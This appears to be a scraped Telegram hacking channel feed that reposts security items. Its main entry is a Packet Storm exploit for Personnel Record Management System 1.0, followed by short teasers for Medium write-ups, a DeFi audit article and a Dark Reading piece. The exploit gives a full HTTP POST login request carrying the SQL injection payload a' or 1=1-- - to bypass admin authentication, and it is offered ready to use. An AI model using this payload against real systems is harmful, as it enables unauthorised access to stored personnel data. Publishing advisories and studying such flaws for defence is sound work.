Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.7K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Personnel Record Management System 1.0 SQL Injection

https://4.bp.blogspot.com/-9fc43SI8K3Q/WWlvhaBflZI/AAAAAAAAIQU/x3qxae6Q3eMl1Wf8m-XtOKQ3MaKSPPWfQCLcBGAs/s1600/h90.png
Personnel Record Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | 58f624d5b154400123a08e3fc900c8e1

Download
# Exploit Title: Personnel Record Management System | Admin Bypass (sqli)
# Exploit Author: Richard Jones
# Date: 28/06/2021
# Vendor Homepage: https://www.sourcecodester.com/php/5107/record-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5107&title=Record+Management+System+in+PHP+Free+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Exploit:
-------------------------------------------------------------------------------------------------
POST /Personnel_record_management_system/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Personnel_record_management_system/
Cookie: PHPSESSID=8bkj7jlpmlbuqtnti8urp7qcmo
Upgrade-Insecure-Requests: 1

UserName=a%27+or+1%3D1--+-&Password=a&Login=

-------------------------------------------------------------------------------------------------
Unencoded: a'or 1=1-- -

Source:packetstormsecurity.com
On October 31, 2020, @SamyKamkar published his research on NAT Slipstreaming. According to his own words, NAT Slipstreaming —Continue reading on Medium » (https://vovohelo.medium.com/how-i-found-my-first-chrome-bug-cve-2021-21210-248a21272248?source=rss------bug_bounty-5)
Audits have become a staple of the DeFi industry. They’re an essential part of the DeFi security stack, which also includes automated…Continue reading on Immunefi » (https://medium.com/immunefi/the-future-of-audits-in-defi-security-68d8bed15187?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
The Danger of Action Bias: Is It Always Better to Act Quickly?

Experts discuss the meaning of action bias and how it presents a threat to IT security leaders, practitioners, and users.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Time in your hands Challenge

https://cdn-images-1.medium.com/max/780/1*djjj91obZG1X4QO9Q-PGOA.jpeg
You found login source code of the bank on the dark web.You test the administrator password on bank site, but it already changes.How can…

Continue reading on Medium »
Sent by @TheFeedReaderBot
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Library (Tryhackme) Room Writeup By Jonty Bhardwaj

https://cdn-images-1.medium.com/max/809/1*MxbnD862YTwKTSe4wNo6VQ.png
Hello Reader, I am Jonty Bhardwaj currently enrolled in Master Certificate in Cyber Security HackerU program. Today I am here to share a…

Continue reading on Medium »
Sent by @TheFeedReaderBot